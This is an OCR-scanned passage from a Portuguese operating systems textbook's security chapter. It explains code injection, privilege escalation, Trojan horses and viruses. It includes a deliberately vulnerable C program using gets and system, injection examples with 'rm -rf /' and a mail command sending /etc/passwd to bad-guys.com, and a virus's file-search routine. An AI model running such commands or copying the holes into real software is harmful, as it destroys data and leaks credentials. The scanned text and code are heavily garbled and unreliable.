grama calculara incorretamente a ąuantidadc de memória 
necessaria ao armazena memo da imagem e cha mara malloc 
para alocar um buffer muitissimo menor. Tem-se, entao, a 
siluaęao perfeita para um ataque de transbordamento do 
buf ter Ouiras abordagens sao posstvcis ąuando a soma ou 
o produto dc inteiros positivos sinalizados resultani cm in- 
teiros negaiivos. 

9.6.51 Ataąues por injcęao de código 

Um lipo de exploraęao de faliias de seguranęa envolve 
fazer com que o programa-alvo execute código sem perce- 
ber que esta executando. Considere um programa que F em 
detenninado momento, precisa duplicar com outro nonie 
um arquivo forneddo pelo u su ario (como backup, talvez). Se 
o programador for prcguięoso dcmais para escrever o código, 
ele pode utilizar a funęao system, que gera um novo processo 
com um interpretador de comandos c cxccuta scus argu- 
mentos como um comando. Por cxemplo, o código cm C 

systemfis >file-tist") 
gera um shell que executa o comando 

ts >file-list 

que lista todos os arquivos no diretório atual e os cscrcve 
cni um arquivo charnad o file-list O código quc o progra¬ 
mator prcguięoso pode utilizar para duplicar o arquivo e 
most rado na Figura 9.24 + 

O que o programa faz e solicitar os nomes dos arquivos 
fonte e destino, construir urna linha de comando utilizando 
cp c, entao, chamar a funęao system para executar a linha, 
Sc o usnario digitar "abc" e "xyz v , rcspcctivamcntc, o co¬ 
mando cxccutado c 

cp abc xyz 

que acaba copiando o arquivo. 


Figura 9.23 (a) A pilha antes (Jo ataque. (b) A pilha depois de 
I sobrescrita. 





















Sn*W66G 


412 Sistemas operadonals modernos 


int main(int argc, char *argv[|) 

{ 

P declara tres cadeias de caracteres 7 
P solictta o nome do arquivo fonte 7 
/* recebe enlrada via teclado 7 
P concatena src depois de cp 7 
P acrescenta um eepaęo no finał de cmd 7 
P solioita o nome do arquivo destino 7 
P recebe entrada via teclado 7 
P completa a string de comandos 7 
P execula o comando cp 7 

} 

I Figura 9.24 Código que pode ievar a um ataque por injeęao de código. 


char src[100], dst [i00], cmd[205]= N cp 

printf( u Por favor r digite o nome do arquivo-fonte: l5 ); 

gets(src); 

strcat(cmd, src); 

strcat(cmd, u ”); 

printf(°Por favor, informe o nome do arquivo destino: "j; 

gets(dst); 

strcat(cmd f dst); 

system (cmd); 


Infelizmente, esse código abre um enornie rombo na 
seguranęa utilizando uma tecnica cha mada injeęao de có¬ 
digo, Imagine que o usuario digite y abc' e J xyz; rm -rf O 
comando omstrufdo e executado e o seguinle: 

Cp abc xyz; rm -rf / 

qne primeiro copia o arqtiivo e. em segnida, tema recursi- 
vamenie apagar todos os arquivos e diretórios em todo o 
sistema de arquivos, Se o programa cstivcr sendo exccuta- 
do como superusuario, pode ser bem-sucedido. O proble- 
ma, e claro, e que tudo o que esta depois do porno e virgula 
e execmado como um comando shelL 

Outro exemplo de valor para o segundo argumentu 
pode ser 'xyz; mail sriooprer@bad-guys.cQni </e tc/pass wd', 
que gera 

cp abc xyz; mail snooper@bad- guys.com </etc/passwd 

que envia o arquivo dc senhas para um usuario desconhe- 
cido e nao confiavd. 

9.6.61 Ataque$ de escalada de privłlegio 

Outro lipo dc ataque ć o ataąue de escatada de pri- 
yilćgio, no qual o atacantc engana o sistema e faz com que 
de Ihe conceda dtreitos dc acesso maiores do que aąueles 
aos quais Lem dircito. Em geral # o ata canto faz com quc 
o sistema execute aJgo quc somente o superusuario pode 
fazer. Um exemp!o fani oso e o de um programa que fazia 
uso do daemon cron, quc permite quc os usuańos agen- 
dem servięos para serem executados toda hora, di a ou śc¬ 
inana (on em outra frequenda qualquer). Esse daemon 
normalnienie e executado como ront (ou como algo tao 
poderoso quamo), para que possa acessar arąuiros a partir 
dc qualqucr conta de usuario, Ele possui um diretório no 
qual armazena os comandos agendados para execuęao. Os 
usuarios nao podcrn gravar nesse diretório, e claro, ja quc 
isso Ihcs permiliria fazer qualquer coisa. 


O ataque foi da seguime maneira: o programa da aia- 
cante definiu seis diretório dc trabalho como sendo o dire- 
tório do daemon cron. sem se import ar com o falo de nao 
poder gravar nada la e, emao, ele travou de modo a foręar 
um despejo de memória a eon tece m no diretório de traba¬ 
lho que, nesse caso, era o diretório do daemon cron. Como 
as cópias sao executadas pdo sistema, a gravaęao nao foi 
proibida pelo sistema de proteęao, A i ma gem de memória 
do programa atacanlc foi estru tu rada de forma a ser um 
conjunto valido de comandos para o daemon cron, que os 
executaria como roob O primeiro comando alterava para 
SETUID de root um programa determinado pelo atacame 
e o segundo comando executava o programa. Nesse ponto, 
o atacame linha um programa qualquer sendo executado 
como superusuario. Essa falha ja foi corrigida, mas o exem- 
plo e valido para que se tenha urna ideia desse lipo de ataque, 

Malware 

Amiga menie (digamos, antes do ano 2000), adoles- 
cenies emediados (porem espertos) cosiumavam ocuparseu 
tempo livre escrevendo pro gra mas malidosos que mais tarde 
distribuiriam pelo mundo sem motivo algum. Esses progra- 
mas. que ind ufam cava]os de Troia, vfrus e vermes c eram 
coletivamentc diamados de malware, espalhavam-se rapi- 
damenle pelo mundo. Os autores !mpressionavam-sc com 
suas habilidades dc programaęao a medida que era divul- 
gada a ąuantia em milhóes de dólarcs em da nos ca u sad os 
pdo malware c a volume dc pessoas que perderam sens 
valiosos dados em funkio deles. Para des era somente di- 
versao, ja que nao estavam ganhando dinheiro algum. 

Essa epoca passou. Agora, malware ć escrito sob enco- 
menda por critninosos bem organizados que preferem nao 
vcr scu trabalho publicado nos jornais e que estao nesse 
ramo simpksmente pdo dinheiro. Grandę parte do mal¬ 
ware e criada dc modo a sc propagaro mais rapido posswd 
pcla Internet c infectar ąuantas ma qu i nas puder, Quando 
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uni compuiador e infectado, instala-se um software que 
informa o endereęo da maquina capturada a um grupo de- 
tcrminado dc compuiadorcs, normaImcnie localizados em 
pafses cujos sistemas judidais sao pouco deseńvolvidos ou 
comiptos, como algnmas repiiblkas sovieticas, por exemplo. 
Instala-se ainda nma porta dos fundos qne permite aos 
a i mi no sos re$pon$aveis pclo malware com a n dar a maąuina 
facilmenie. Um compuiador invadido desse modo e dcnomi- 
nado zumbi, e um grupo dc maąuinas dcssc tipo chama-se 
botnet — abrcviaęao dc robot mtwork (rede de robo}. 

Um criminoso que controlc u ma boinet pode aluga- 
-la por diversos motivos mal-intencionados (e sempre co- 
merciais), como o envio comerdal de spam. Se um forte 
ataątie por spam acontecer e a polfcia tentar idemificar sua 
origem, mdo o que ira descobrir e que ele partiu de milha- 
rcs dc maąuinas espaihadas pclo mundo, Sc invesiigarcm 
seus proprietarios, verao que os computadores pertencem 
a crianęas, pequenos comerdantes, don as de casa, idosose 
outras pessoas que nao adrmtirao o envio niacięo de spam. 
Usar as maąuinas alhdas para o trabalho sujo ć o que di- 
ficulla a identificaęao dos criminosos por tras da operaęao. 

Unia vez instalado, o malwarc lambem pode ser utili- 
zado para oulros propósifos criminosos, como chama gem, 
por exemplo. Imagine um malware que codifiąue todos 
os arquivos do compuiador da vftima e, a o finał, exiba 
a mensagem: 

SAUDAęÓES DA GENERAL ENCRYPUON! 

PARA COMPRAR UMA CHAYE DE DECRIPTAęAO 
PARA $EU DISCO RlGIDO, POR FAYOR ENYIE US$ 100 
EM NOTAS DE BAIXO VALOR, SEM MARC AS, PARA A 
CA1XA POSTAŁ 2154, C1DADE DO PANAMA, PANAMA. 
OBRIGADO. FOI BOM FAZER NEGÓCIO COM VOCE. 

O u li a aplicaęao comum no mal warc ć a instalaęao de 
um keylogger na maąnina infectada. Esse program a re- 
gistra todas as infomiaędes digitadas e periodfcamente as 
envia a alguma maąuina ou seąuencia dc maąuinas {inclu- 
sive znmhis} para que sejam repassadas ao criminoso. Fazer 
com que o provedor dc servięos de Imcrnet da maąuśna de 
entrega coopcre cm urna hwesdgaęao ć nma tarefa diffcil, 
ja que muitos deles atuam cm conjunto com os criminosos 
(ou sao de propriedade deles), 

A pedra preciosa em meio as muitas tedas digitadas e 
composla por nu mer os de car ta o de credito, os quais po¬ 
de m ser utilizados na compra de bens em comercios legf- 
timos. Como as viiimas someme saberao qne tiveram os 
nu mero s dos cartoes roubados quando receberem as fatu- 
ras, os criminosos podern gastar a vontade durante dias, se 
nao semanas. 

Para se proteger desses ataąucs, todas as empresas dc 
cartoes de credito recorrcm a software de inteligencja ar¬ 
ii ficia I para idemificar padroes irregulares de gasi os. Por 
exemplo, se urna pessoa que normalmente u liii za o cartao 
nas lojas da redondeza de repenle encomenda u ma duzia 
de notebooks caros e pede que eles sejam entregues, diga- 


mos, no Tajiquisiao, soa um alerta na adminisiradora do 
cartao e um funcionario normalmente liga para o proprie- 
tario para educadarnente perguntar sobre a transaęao. E 
claro que os criminosos sabem da existenda desse progra- 
ma e, portanto, tentam ajustar seus gastos aos habitos do 
dono do cartao para que nao despertem nenhuma suspeita. 

Os dados coletados pclo keylogger podern ser combi- 
nados com outros dados obtidos pelo software instalado 
no zmnbi de forma a permitir que o criminoso inicie um 
roubo de identidade niais intenso. Nesse tipo dc crime, o 
criminoso obtem dados suficientcs sobre a pessoa — como 
data de nascimcnto, nonie dc solteira da mac, nu mero do 
seguro social, n ii mero das contas bancarias, sen has etc. — 
de modo a assumlr a personalidade da vflima, oblcr docu- 
mentos novos e substituir carteira de motorista, cartao do 
banco, certidao dc nascimcnto c outros. Esscs documenios 
podcm, por sua vez, ser vendidos a outros criminosos para 
futura exploraęao. 

Outro lipo de crime comelido pelo malware e nao cha- 
mar a atenęao ate que o usuario se conecte corretamen¬ 
ie a sua conta bancaria pela Internet. Urna vez conectado, 
o malware execma urna transaęao rapida para descobrir 
ąuanto dinheiro existe na conta c transferc imediatamentc 
a ąuantia para a conta do criminoso, e depois para outra 
conta e outra (localizadas em diferentes pafses corruptos), 
para que a policia de morę dias ou sema nas para conseguir 
todas as garantias dc quc precisa para rastrear o dinheiro, 
garantias que podem nao ser cumpridas mesmo ąuando a 
ąuantia e rccuperada. Essc tipo de crime e coisa de 'peixes 
grandcsc nao mais dc adolcscentes inąuietos* 

Alem do uso pelo crime organizado, o malware tam- 
bem tein aplicaęoes industriais. Uma enipresa pode distri- 
buirum malwarc quc verifique se esta sendo executado em 
uma empresa rival sem nenhum adminlstrador dc sistema 
atualnieme conectado. Em caso afirmativo, ele poderia in- 
lerferir no procesjo dc produęao, reduzindo a ąualidade 
do produto e causando, desse modo, problemas ao conn 
petidor, Ele nao [aria nada nas outras situaęocs c, assiia 
dificultaria sua ldentLflcaęao. 

Um outro Lipo dc malware direcionado e um progra- 
ma que poderia ser escrito pelo vice-presidente de uma or- 
ganizaęao ambiciosa e distribuido pela rede local O yirus 
poderia verificar se esta em fundonamento na maquina 
do presidente e, estando nela, encontraria uma pla n ii ha e 
trocaria a posięao de duas celu las aleatórias. Mais cedo ou 
mais tarde, o presidente tomaria uma decisao cquivocada 
com basc na planilba e, lalvez, acabasse demitido por conta 
da decisao, deixando a cadeira vaga para voce sabe quem. 

Algumas pessoas a udam o dia inteiro com um chip so- 
brc os ombros (nao confuiidir com aąucles que possuem 
chips RF1D — Radio Freguency lDmłification r ou idcntificaęao 
por radiolreąucnda — daitro dos ombros), Eles guardam 
algum rancor real ou imaginario em rclaęao ao mu udo e 
ąuereni se vtngar. O malware pode ajudar, Muitos compu- 
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tadores modemos armazenam a BIOS em memória flash, 
que pode ser sobrescrita medianie o controle do programa 
(para permitir que o labricante distribua correęoes de erros 
eletronicamente). O malware pode gravar lixo aleatório na 
memória flash dc modo quc o computador parę dc inicia - 
lizar. Sc o chip da memória flash cstiver em urn soąuete, 
a concęao do crro rcąucr a abertura da maąuina c a subs- 
lituięao do chip, Se o chip e$tivcr soldado a placa-mae, e 
possfrel que loda a płaca len ha de ir para o !ixo e unia nova 
precise ser comprada, 

Poderfamos falar muito mais r mas voce ja deve ter 
comprccndido. Sc quiser mais histórias dc terror, basta di- 
gitar malware cm qualqucr buscador. 

Urna pergunta muito comtini para muitos e: "Por que 
malware se espalha lao rapidamente?". Ha muifas razoes. 
Primeiro, algo em torno de 90 por cento dos compu tado¬ 
res numdiais funcionam com (d de rent es versoes de) so- 
mentc urn sistema operacionał: Windows, um alvo faril Se 
cxistisscm dcz sistemas operadonais diferentes, cada um 
rcsponsavel por 10 por ccnlo do mcrcado, a distribuięao 
dc malware seria muitfssimo mais difiriL Como no mim do 
biologico, a diversidade e urna boa defesa. 

Segundo r a Microsoft, desde o initio, enfatizou seu 
desejo de tomar o Windows facil de usar para o publice 
nao esperializado, Por exemplo, os sistemas Windows estao 
configurados de modo a permitir a inidalizaęao semsenha, 
ao passo quc, historicamente, os sistemas UN1X sempre so¬ 
li ci taram sen ha (embora essa exceknte pratica esteja tarn¬ 
iki em desuso a medida que o Linux lenta ficar cada vez 
mais pa red do com o Windows). Existem dhersas o u tras 
escolhas eon (lita mes entre boa seguranęa e facilidade de 
uso e a Microsoft sempre tem escolhido a segunda como 
estrategia de mercado, Se voce acha que a seguranęa e mais 
imponante, interrompa esia leitura e eonfigurę seu telefo- 
ne celular para que dc solidtc o código PIN antes de fazer 
urna ligaęao — e possfycl fazer isso cm quasc todos des. Se 
nao sabc como fazc-lo, faęa downioad do manuał do usua¬ 
rio no sile do fabricanto. Entendcu, nao? 

Nas próximas seęoes, veremos as formas mais comuns 
de malware e como sao construidas e disiribmdas. Mais 
adiante, vcremos algumas formas de ddesa contra das* 

9.7.1 I Cavalos de Troia 

Escrever malware e urno coisa passfvel de ser feita em 
sen quarto. DistribuMo para milhoes de pessoas c instalado 
cm su as maquinas, entre tam o, c outra coisa. Dc que for¬ 
ma Mat, nosso produtor dc malware, faria isso? Urna pra- 
tica muito comum c cscrcver um programa genuinainente 
lilii e embutir o malware nde* Jogos, tocadores dc musi ca, 
visualizadores 'especiais' de pornografia e qualquer outra 
coisa com gra fi coś atraentes sao candidaios em potential. 
As pessoas volumariameme copiam e instalam essas apli- 
caęoes e, como bonus, instalam tambem o malware. Cha- 
mamos essa abordagem de cavalo de Troia, em alusao 


ao cavalo de madeira clieio de soldados gregos descriio na 
Odisseia, de Homer o. No mun do da seguranęa de conipiila- 
dores, de passou a representar qualquer lipo de malware 
escondido em um software ou pagina da Internet que as 
pessoas copiam vo!untariamente, 

Quando o novo programa e iniciado, ele chama urna 
funęao que escreve o malware no disco como um progra¬ 
ma executavel e o inicia. O malware pode, entao, realizar 
qualquer dano para o qual tenha sido programado, como 
exdtiir, modificar ou criptografar arquivos. Ele tambem 
pode procurar por mimeros dc carlao de credito, senhas e 
outros dados liteis e envia-los dc volta a Mai pcla Internet, 
O mais provavcl c quc cle sc concctc a alguina porta IP c 
cspcrc pclas instruęóes, transformando a maąuina cni um 
zumbi pronto para cnviar spam nu cxccutar qualqucr or- 
dern que seja da vomade dc seu itiestre remom, Em geral 
o malware tambem executa os comandos necessarios para 
garantir que o malware seja reinidado quando a maąuina 
for reinidalizada. Todos os sistemas operadonais tem urna 
forma de fazer isso. 

A bdeza do ataąuc por cavalo dc Troia e quc cle nao 
rcqucr que seu autor invada o computador da vuima, Esta 
faz todo o irabalho. 

Ha outras maneiras de fazer a vitima exeaitar o pro- 
grama do cavalo de Troia- Por exempio, muitos tisuarios 
UNIX tem unia variavd ambiente, $PATH, quc definc quais 
diretórios dcvem ser procurados para executar os coman- 
dos. Esses diretórios podem ser vistos digitando-se o se- 
guinte comando no shdl: 

echo $PATH 

lima posswd conllguraęao para o usuario ast em um 
determinado sistema poderia ser constitufda dos seguintes 
diretórios: 

:/usr/ast/bin:^usr/local/bin:/usr/bin:/bin:/usr/bin/ 
XI l:Aisr/ucb:/usr/maś\ 

:/usr/java/bin:/usr/java/lib: Aisr/iocal/man:/usr/ 
openwin/man 

Outros usuarios terao um ca min ho de busca diferente, 
Quando o usuario digiia 

próg 

no shell esic primeiro verifica se ha utn programa cha- 
mado fusr/asł/bittfproih Se houver, de sera execulado. Do 
conirario, o interpretador lentara /usr/Iecaifbin/prog, hml 
bhifprog, Jbin/prog e assiin por dian te, lentando todos os dez 
diretórios anies de desisiir. Suponha que apenas um des- 
ses diretórios esteja desprotegido e propfcio para que um 
cracker insira um programa nele. Se esse diretório for a 
primdra ocorrenda do programa na lista, o programa sera 
executado e o cavalo de Troia comeęara a agir. 

Os programas mais comuns ficam no /but ou no tor/ 
bin; portaiuo, colocar um cavalo de Troia em Iu$rIbinłXl Uls 
nao funcionaria para um programa comum, pois o progra- 
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ma real seria encomrado primeiro, Contudo, suponlia que 
o cracker insira la em fusr/binfXIl. Se um usuario digitar 
la em vez de Is (o programa que lista o diretório}, entao o 
cavało de Troia executara, fara sen trabalho sujo e emitira 
a mensa gem correta dc que la na o cxistc. Inserir os cava- 
los dc Troia em diretórios complicados c quc dificilmcntc 
algućm y cii fi cara c, alcrn disso, atribuir a des nomes quc 
pareęam erros coimms dc digitaęao, gera grandes possi- 
bilklades de que algucm o invoque, cedo on tarde* Esse 
alguem poderia ser o superusuario (ate os superusuarios 
cometem erros de digitaęao); nesse caso, o cavalo de Troia 
teria a o pomni i da de de substiiuir o łhin/h por u ma versao 
que contivesse o cavalo de Troia e que, conseąuentemente, 
poderia ser hwocado a qualqner moinenio, 

Nosso usuario mal-intencionado, porem cadastrado, o 
MaL tambem poderia armara seguinte armadiiha para o 
superusuario: por uma verslo do & contendo um cavalo de 
Troia em seu próprio direiório e, en la o, fazer algo suspei- 
to que com certeza atraisse a atenęao do superusuario — 
como comeęar a executar cem processos com o uso inten- 
sivo de CPU, todos de uma só vez. h bem provavel que o 
superusuario verifique o quc esia acomcccndo, digitando 

cd /home/mal 

Is -I 

para ver o que Mai tern em seu diretório locab Como al- 
guns shells primeiro tentam vcriQcar o diretório local 
ant es dc ir ate a variavel $PATH, o superusuario pode ter 
acabado dc invocar o cava!o de Troia de Mai com poderes 
dc superusuario, O cavalo de Troia poderia alterar Ihomd 
malibinhh para possuir um SET U ID de root. Tudo o quc 
resta fazer sao duas chamadas de sisiema: chown para 
alterar a propriedadc de łhomefmaUhinfsh para root e 
chmod para alterar seu bit SET LUD. Agora Mai pode se 
tor nar um superusuario ąuando quiser, apenas cxecu- 
tando esse sbcll. 

Se Mai achar que esta sempre sem dinheiro, de pode 
usar um dos seguimes cavalos de Troia fraudadores para 
ajudar a devar sua liquidez. No primeiro, o cavalo de Troia 
vcrifica sc a vitima tem algum programa instalado dc banco 
on-linę, tal como o Qukken. Se tiver, o cavaio de Troia fara 
com que o programa iransfira algum diuheiro da co ma da 
vitima para uma conta de fachada (prefeiwelmente em um 
pafs bem distante) para depois pegar o dinheiro. 

Na segumla fraude, o cavalo de Troia primeiro desliga o 
som do modem e entao digiia um nu mero 900 (para servi- 
ęos pagos — novamente, de preferencia em um pais distan- 
te, como a MoIdavia r parte da antiga Uniao Sovietica). Se o 
usuario esiivcssc conectado ąuando o cavalo dc Troia fos- 
se hwocado, entao o nu mero 900 na Moldavia precisaria 
ser o dc um provcdor dc scnięos dc Internet (muito cara), 
para quc o usuario nao percebcsse e, quem sabc, fteasse co¬ 
nectado por horas. Nenhuma dessas tecnicas e hipotetica; 
ambas a eon tece ram e foram relatadas em Denning (1999), 


Nessa ultima, foram contabilizados 300 mil minut os de 
conexao para Moldavia ant es que a Comissao Federal 
de Comercio dos Estados Unidos ordenasse uma des- 
conexao e entregasse trćs pessoas dc Long Island a jus- 
tięa. Ao finał, elas concordaram em dcvo!ver os 2,74 
milhocs dc dólarcs para as 3S mil vftimas. 

9-12 I Virus 

E dtficil abrir os jornais hoje em dia e nao ler nada 
a respeito de um novo virus ou vcrmc atacando os com- 
putadores mundo afora, Esta daro quc clcs sao um serio 
problem a de seguranęa tanio para as empresas quanto para 
os indiv]duos, Nesta seęao, falaremos sobi e vfrus e r em se- 
guida, sobie vermes. 

Estava um tamo hesitante em cscrever esta seęao com 
tamos detalhes, pois poderia acabar dando mas ideias a 
aigumas pessoas, mas ja existem livros que fomeccm dę¬ 
ta Ihes muito maiś aprofundados e aiuda fornccem código 
real (Ludwig, 1998, por exemplo) + Al Cm disso, a Internet 
esta rep!eta dc informaęoes sobrc virus; portamo, nao ha o 
que te mer. E diftcil para as pessoas se defenderem dos viTus 
se elas nao sabem como des funcionam. Por firn, ha muitos 
equivocos rdacionados a virusque precisam sercorrigidos. 

O que e um vfrus, entao? Para encurtar, um virus e 
um programa capaz, entre outras coisas, de se reproduzir 
anexando seu código a outros programas, semclhante a 
forma como os virus biológicos se reproduzem. Vermes sao 
como vfrus, mas se autorreplicam. Essa diferenęa nao e im- 
portame para nós neste momemo. Voltaremosa falar sobre 
vermes na Seęao 9.7.3. 

Como 0$ virus funcionam 

Agora vamos ver os tipos de viTus e como funcionam. 
Yirgflio escreve seu wus, provavelmenie em linguagem as- 
sembly (ou em C) para obicr um produto peąueno c eficien- 
le. Ele, en la o, o insere cuidaddsa menie em um programa 
de sua própria maquiua, usando uma fcrramenla chamada 
dropper. Esse programa infectado e, entao, distribuido, tal- 
vcz post a do para a Ig uma coleęao dc soft war es gratis na In¬ 
ternet. O programa poderia ser um novo c excitante jogo, 
uma vcrsao pirateada dc algum software comerdal ou 
qualqueroutra coisa considerada desejaveł. As pessoas, en- 
lao, comeęam a baixar (download) o programa infectado, 

Uma vez instalado na maąuina da vttima, o yfrus fi ca 
latcnie atć quc o programa infectado seja executado, Uma 
vez iniciado, normalnienie ele comeęa a infectar outros 
prógramas da maąuina e, entao, dispara sua carga util 
{payioad ). Em muitos casos, a carga util pode nao fazer 
nada enąuanto uma certa data nao chegue, para assegu- 
rar que o virus esteja espalhado antes que as pessoas co- 
me cem a nota-lo. A data escolhida pode enviar ate mesmo 
uma mensagem polftica (por exemplo, se ele dispara no 
100-ou 500- aniversario de algum grave i n su ko ao grupo 
etnico do autor). 
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Na discussao a seguir, examinaremos sete itpos de vf- 
rus com base no que e infectado. Esses sao os virns com- 
panheiros, de programa executavel r de memória, de setor 
de inicializaęao, dc unidade dc urn dispositivo c de código- 
-fonte. Sem duvida, novos tipos surgirao no futuro. 

Viru5 companheiro 

Um vfrus cornpanłieiro nao infcda rcalmeme um 
programa, mas executa ąuando o programa for cxecutar. 
O conceito e mais Ta cii de explicar com um exemplo. No 
MS-DOS, ąuando um usuario digiia 

próg 

o MS-DOS primeiro procura por um programa chamado 
prog.com. Se ele nao conseguir encontrar um, procura um 
programa chamado prog.exe. No Windows, ąuando o usua¬ 
rio dica em Inidar e entao cm Executar, acontece a mesrna 
coisa. Atuahnente, a maioria dos programas e de arquivos 
exc; os arquivos .com sao muito raros. 

Suponha que virgflio saiba que muitas pessoas execu- 
tam prog.exe a partir do smal de promidao do MS-DOS o u 
do Executar no Windows. Ele pode simplesmerue lanęar 
um vfrus chamado pro^.com, que sera executado ąuando 
alguem tentar executar próg (a menos que ele realmeme 
digkc o nome completo: prog.exe). Quando prog.com termi- 
na scu trabalho, ele apenas executa o prog.exe e o usuario 
nem desconfia. 

Um ataque semelhante usa a area de trabalho 
(desktop) do Windows, que eon te m os atalhos (ligaęoes 
simbólicas} para os programas. Um vfrus pode alterar o 
destino de um atalho para que ele aponte para o virus. 
Quando o usuario da dois diqucs cm um fcone, o vfrus e 
CKCcutado. Quando termina, o vfms comeęa a executar o 
programa original do atalho. 

Virus de programas executaveis 

Os vfnis que infectam programas executaveis sao um 
pouco mais eomplexos. O mais simples desses vtrus apenas 
sobrescrevc o programa executavel com o próprio código. 
Sao os chama dos yints de sobreposięao (ovenvriiing)- A 
lógica da infecęao desses virus e mosuada na Figura 9.25, 

O programa principal desse vfrus co pi aria primeiro seu 
programa binario em um vetor abrindo o arquivo indicado 
por argv[Q] c Icndo-o para mante-lo cm um lugar seguro 
e, entao, percorreria todo o sistema de arquivos, a partir 
da taiz, mudando o diretório dc trabalho para a raiz c clta- 
mando search, lendo como parametro o diretório* rai z. 

O proccdimento rcctirsivo search processa um diretório 
abrindo-o, depois lendo as emradas uma a urna, ttsando 
mddir ató que reiorne NULU indicando que nao ha mais 
entradas. Se a entrada for um diretório, e!a sera p roces - 
sada alterando o diretório atual para essa nova entrada e, 
entao, chama udo search recursiva menie; se a entrada for 
um arqtiivo executavel, cla sera infectada cha mandole in- 


fea com o nome do arquivo a infectar como parametro. Os 
arquivos que comeęam com '/ sao ignorados para evilar 
problemas com os diretóriosV e As ligaęoes simbólicas 
lambem sao ignoradas, pois o programa presume que ele 
pode entrar em um diretório usando a cha mada dc sistema 
chdir c depois voltar para ondc estava, indo para o que 
funciona para ligaęoes rtgidas {kard links) f mas nao para 
ligaęoes simbólicas. Um programa mais degante tambem 
poderia traiar as ligaęoes simbólicas. 

O proccdimento de infecęao real, infect (nao rnostra* 
do), simplesmente deve abrir o arquivo cujo nome e seu 
parametro, copiar o virus que esta salvo no vetor sobrc o 
arquivo c, entao, fechar o arquivo. 

Esse vfrus poderia ser 'melhorado' de varias maneiras. 
Primeiro, poderia ser inserido um tesle dentro do infect para 
gerar um mi mero aleatório e, na maioria das vezes, só re- 
tornar, sem fazer nada. Urna vez a cada 128, por exemplo, 
a infecęao ocormia, reduzindo assim as probabilidades de 
o viius ser deteaado logo, para que antes tenha aportu - 
nidade dc se cspalhar. Os virus biológicos tein a mesma 
propriedade: aąucles ąue matam suas vftimas rapidamente 
nao se espalham tao rapido ąuanto aąucles ąue produzem 
urna morie lenta e gradual, dando as yftimas muitas opor- 
tunidades de espalhar o virtis. Um projeto aItemativo seria 
ter uma aha taxa de infecęao (25 por cento, por exemploj, 
porem com um li miar para o mimero de arquivos simulta- 
neamente infectados, a fint de reduzir a aiividade do disco 
e, desse modo, ser menos explfcito. 

Em segiindo lugar, o infect poderia verificar sc o arqui- 
vo ja foi infectado. Infectar o rnesmo arquivo duas vezes e 
perda de tempo. Em lerceiro, poderiam ser tomadas medi- 
das para manier a mesma dala, o mesmo horario e o mes* 
mo tamanho da ultima akeraęao que o arquivo apresenta- 
va, com o propósito de ajudar a ocultar a infecęao. Para os 
programas maiores que o virus, o tamanho permanecera 
inalterado, mas, para programas menores, o programa sera 
bem maior. Como a maioria dos virus e mcnoi que a maio¬ 
ria dos programas, esse nao e um problcma gravc. 

Embora esse programa nao seja muito grandę (o progra¬ 
ma todo e mertor que uma pagina de código C e o segment o 
de texto compila em menos de 2 KB), uma vcrsao em códi¬ 
go assembly pode ser a te menor, Ludwig (1998) mostra um 
programa, em código assembly para MS-DOS, que infect a 
todos os arquivos de seu diretório c que fica somente com 
44 bytes depois dc mon ta do. 

jMais adiante, neste capitulo, estudaremos os progra¬ 
mas antivirus, que sao programas que procuram e remo- 
vem vtrus. Contudo, e interessante observar que a lógica 
da Figura 9.25, a qual pode ser usada por um virus para 
encontrar todos os arquivos exccu1avcis e infecta-los, tam- 
bem poderia ser empregada por um programa antmrus, 
para rastrear todos os programas infectados e, cm seguida, 
rcmovcr o vfrus. As tecnologias de infecęao e desinfecęao 
andam de maos da das; por isso f e necessario entender de- 
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tiinctude <$ys/types.h> 
#tncfude <sys/stat.h> 
#inciuds <dirent.h> 
tfincEud© <fęntl.h> 
tiinctude <unistdh> 
struct stał sbuf; 


r eabeęalhos-padrao P0S1X 7 


r para a chamada Istat ve}a se o arquivo e u ma ligaęao simb. 7 


search(char *dir_name) 

( 

DIR "dirp; 
struct dirent *dp; 

di rp = opendir(dir_narrie); 
if (dirp == NULL) return; 
while (TRUE) { 

dp = reactdir(dirp); 
if (dp == NULL) { 
chdir (\.“); 
break; 

J 

if (dp->d name[0] == V) continua; 
J$tat{dp->d_name> &$buf); 
if (S JSLNK(sbuf.st modę)) continue; 
if(chdir(dp->d_name) -- 0) { 
search 
} etse { 

if (access(dp->d_name, X _OK) = 0) 
infect(dp->d_riame}; 

) 

closedir(dirp); 

} 


i* busca recursivamente por executAveis 7 
/* ponteiro para um fluxo aberto de diretório 7 
i* ponteiro para uma entrada de diretório 7 

1* abrir este diretóno 7 

/* se dir nao puder ser aberto, esqueęa-o V 

i* leia a prójcima entrada de diretório 7 
r NULL srgnifica que terminamos 7 
/* vo!te ao diretório-pai 7 
/* sai do laęo V 

/* salt© os diretórios . e 7 

i* a entrada e uma ligaęao simbólica? 7 

f* salte as Eigaęóes simbólicas 7 

i* se chdir tiver sucesso, deve ser um diretório 7 

/* sinr>, entre e busque-o 7 

r nao (arąuiyo), infeetado 7 

f* se for executavel, infecte-o 7 


/* diretório processado; feche e retorne 7 


I Figura 9.25 Um procedimento recursivo que encontra arquivos executóveis em um sistema unix. 


taihadarnente como os virus funcionam c ser capaz dc Imar 
efetivamente contra clcs. 

Do porno de vista de Virgflio, o problema do vfrus de 
sabreposięao e quc cle e muito facil dc ser dctcctado. Afi- 
nal, ąuando um programa infeetado executa, dc pode es- 
palhar o virus mais algumas vczcs, mas cle nao faz o quc 
dcveria fazer, c o usuario percebcra isso instantancamcmc. 
Como consequćnda P a inaioria dos vfrus se acopla ao pro- 
grama e faz sen trabalho su jo (infeclar), mas permite que 
o programa ainda funcione norma] menie* Esses vfrus sao 
chama dos de virus parasitas. 

Os vfrus parasitas podem sc acoplar pela frentc, por 
no firn on no meto dc um programa exccuiavc3. Sc um 
virus sc acopla no inicio dc um programa, clc prinidro co- 
pia o programa para a RAM, escreve a si mesmo a f rentę 
do arquivo e, depois, copia o programa de novo da RAM 
depois de si mesmo, co a formę siostra a Figura 9*26(b), 
infelizmente o programa nao podera executar em seu 
novo endereęo virtual; portanto, o vfms deve realocar o 
programa de acordo eom o local para onde fol movido, 
ou voltar ao endereęo virtual 0 depois de terminar su a 
própria execuęao. 

Para evitar as opęoes mais complesas que surgem ao 
carregar no inicio, a maioria dos virus se carrega no fini 
acoplando-se ao finał do programa executavel em vez de se 
acoplar a frerue, akerando o carnpo de endereęo de infcio 


no cabcęalho para quc aponie para o inicio do vfrus, eon- 
for mc iiustra a Figura 9.2ó(c). O vims agora cx ecu lara cm 
um endereęo vinual difereme, dependendo dc qual pro- 
grama infeetado esieja cxecu lando, mas Ludo isso sigm fi ca 
que Yirgflio deve garandrque seu virus seja independente 
